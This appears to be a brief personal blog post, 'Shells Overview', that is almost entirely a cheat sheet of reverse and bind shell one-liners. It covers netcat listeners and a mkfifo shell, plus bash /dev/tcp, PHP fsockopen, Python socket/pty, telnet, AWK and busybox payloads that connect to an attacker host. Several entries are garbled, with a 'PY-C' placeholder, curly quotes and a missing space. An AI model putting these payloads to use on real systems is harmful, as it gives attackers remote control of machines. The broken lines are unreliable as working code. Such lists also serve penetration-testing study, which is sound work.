T4QI
T4QI

Shells Overview

18 May 2025 • 2 min read

Reverse Shell

First we need to start a listener to the reverse shell

BASH 
nc -lvnp 443

# -l to listen
# -v to be verbose
# -n to not dns
# -p to specifiy port

Now how can we write a reverse shell

BASH 
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc ATTACKER_IP ATTACKER_PORT >/tmp/f

Bind Shell

BASH 
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | bash -i 2>&1 | nc -l 0.0.0.0 8080 > /tmp/f

then we need to connect to this binding shell by netcat

BASH 
nc -nv Target_IP Target_port

Shell listeners

How can we enhance our shell experience

  1. rlwrap nc -lvnp 443

  2. ncat we can ssl by --ssl

  3. socat -d -d TCP-LISTEN:443 STDOUT

Shell payloads

Bash

  1. bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1
  2. exec 5<>/dev/tcp/ATTACKER_IP/443; cat <&5 | while read line; do $line 2>&5 >&5; done
  3. 0<&196;exec 196<>/dev/tcp/ATTACKER_IP/443; sh <&196 >&196 2>&196
  4. bash -i 5<> /dev/tcp/ATTACKER_IP/443 0<&5 1>&5 2>&5

PHP

  1. php -r '$sock=fsockopen("ATTACKER_IP",443);exec("sh <&3 >&3 2>&3");'
  2. php -r '$sock=fsockopen("ATTACKER_IP",443);shell_exec("sh <&3 >&3 2>&3");'
  3. php -r '$sock=fsockopen("ATTACKER_IP",443);system("sh <&3 >&3 2>&3");'
  4. php -r '$sock=fsockopen("ATTACKER_IP",443);passthru("sh <&3 >&3 2>&3");'
  5. php -r '$sock=fsockopen("ATTACKER_IP",443);popen("sh <&3 >&3 2>&3", "r");'

Python

  1. export RHOST="ATTACKER_IP"; export RPORT=443; PY-C 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
  2. `PY-C ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.4.99.209”,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“bash”)’
  3. `PY-C ‘import os,pty,socket;s=socket.socket();s.connect((“ATTACKER_IP”,443));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(“bash”)’

telnet

TF=$(mktemp -u); mkfifo $TF && telnet ATTACKER_IP443 0<$TF | sh 1>$TF

AWK

awk 'BEGIN {s = "/inet/tcp/0/ATTACKER_IP/443"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

busy box

busybox nc ATTACKER_IP 443 -e sh `

Start searching

Enter keywords to search articles.

↑↓ Navigate
Select
ESC Close
CtrlK Shortcut